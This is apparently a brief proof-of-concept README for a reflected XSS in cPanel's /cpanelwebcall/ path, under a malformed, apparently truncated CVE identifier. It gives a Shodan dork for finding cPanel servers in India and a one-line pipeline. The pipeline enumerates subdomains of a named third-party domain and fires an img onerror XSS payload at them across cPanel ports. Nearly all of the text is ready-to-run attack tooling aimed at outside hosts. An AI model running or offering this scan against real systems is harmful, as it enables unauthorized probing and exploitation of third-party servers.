C-Panel Reflected XSS - CVE-2023-294

POC for CVE 2023-294

Shodan dork: product:"cpanel" country:"IN"

#one liner

sudo subfinder -d move2inbox.com -silent -all | httpx-toolkit -silent -ports http:80,https:443,2082,2083,2086,2087 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400